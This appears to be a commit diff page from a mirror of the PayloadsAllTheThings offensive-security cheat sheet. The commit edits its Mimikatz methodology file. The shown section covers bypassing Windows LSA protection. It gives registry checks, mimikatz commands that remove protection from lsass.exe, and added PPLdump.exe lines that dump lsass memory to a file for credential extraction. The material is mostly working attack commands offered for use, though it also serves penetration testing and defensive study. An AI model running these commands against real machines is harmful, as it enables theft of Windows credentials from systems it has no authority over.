admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

PS Transcript + PPLdump.exe

Browse Source
This commit is contained in:
Swissky
2021-05-06 18:26:00 +02:00
parent 28a48bd696
commit a723a34449
4 changed files with 83 additions and 69 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
Methodology and Resources/Windows - Mimikatz.md
View File

@@ -64,7 +64,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
## Mimikatz - LSA Protection Workaround
- LSA as a Protected Process
- LSA as a Protected Process (RunAsPPL)
```powershell
# Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
@@ -83,9 +83,15 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
# Now lets re-add the protection flags to the lsass.exe process
mimikatz # !processprotect /process:lsass.exe
# Unload the service created
mimikatz # !-
# https://github.com/itm4n/PPLdump
PPLdump.exe [-v] [-d] [-f] <PROC_NAME|PROC_ID> <DUMP_FILE>
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
```
- LSA is running as virtualized process (LSAISO) by **Credential Guard**